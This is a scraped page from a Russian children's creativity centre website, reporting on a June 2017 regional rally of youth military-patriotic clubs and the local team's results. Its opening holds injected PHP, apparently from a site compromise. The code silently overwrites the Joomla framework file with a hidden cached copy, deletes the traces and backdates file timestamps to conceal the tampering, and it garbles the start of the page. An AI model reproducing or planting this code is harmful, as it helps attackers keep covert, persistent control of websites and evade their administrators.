$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } «Отчизны верные сыны»
МАУДО "Дом детского творчества п. Новосергиевка" Новосергиевского района Оренбургской области

Регистрация Вход

Зарегистрируйтесь, чтобы оставлять комментарии в гостевой книге



Спасибо за регистрацию

Ссылки

План мероприятий

Декабрь 2017
Пн Вт Ср Чт Пт Сб Вс
27 28 29 30 1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
Developed by JoomVision.com
Баннер
  • Toggle
  • Закрыть

«Отчизны верные сыны» PDF Печать E-mail

       С 13 по 18 июня 2017 года в Оренбургском районе на базе учебного центра войсковой части № 33860 состоялся XVII областной слёт военно-патриотических клубов и объединений «Отчизны верные сыны».

На слёт собрались обучающиеся военно-патриотических клубов и объединений, кадетских классов из Оренбурга, Медногорска, Адамовского, Бузулукского, Илекского, Красногвардейского, Матвеевского, Новосергиевского, Оренбургского, Переволоцкого, Ташлинского, Тоцкого и Тюльганского районов, всего 14 команд.

Наш Новосергиевский район представляли учащиеся школ п.Новосергиевка: НСОШ№1 Дедловский Артем, Серенков Вячеслав, Сливкин Дмитрий, Пименов Андрей, Рахимжанов Азат; НСОШ №2 Кузенков Данила; НСОШ №3 Подшивалов Ярослав, Зорин Никита, Щепеткин Никита и руководители команды: З.Г.Даутов, О.Е.Кулебякин.

Программа слёта разделена на пять тематических блоков:

  1. «В здоровом теле – здоровый дух» – состоит из упражнений по военно-прикладному спорту (подтягивание на перекладине; бег 100 метров; бег 3000 метров; общее контрольное упражнение на единой полосе препятствий; стрельба из АК-74; плавание на 50 метров в спортивной форме вольным стилем).
  2. «Отчизны верные сыны» – посвящён теоретической подготовке (исторический конкурс «Ратные страницы истории Отечества»; конкурс «Возьми в пример себе Героя»; конкурс по медицине «Если ты остался один на один с пострадавшим»).
  3. При выполнении заданий третьего блока «Тяжело в учении, легко в бою» участникам слета предстоит продемонстрировать военную подготовку.
  4. В четвертом блоке объединены военно-прикладные и технические виды спорта (стрелковый поединок; перетягивание каната).
  5. Пятый включает творческий конкурс «Моя малая Родина» (визитка – представление команды). 

По итогам 5 конкурсов, в очень упорной борьбе наша команда «Россияне» заняла 9 общекомандное место.

Мы поздравляем наших юнармейцев!

4qxf-gw15cw

 

img_1579

 

ocvpdc9gxjw

 

comback_black_green_75

Обновлено 19.06.2017 16:22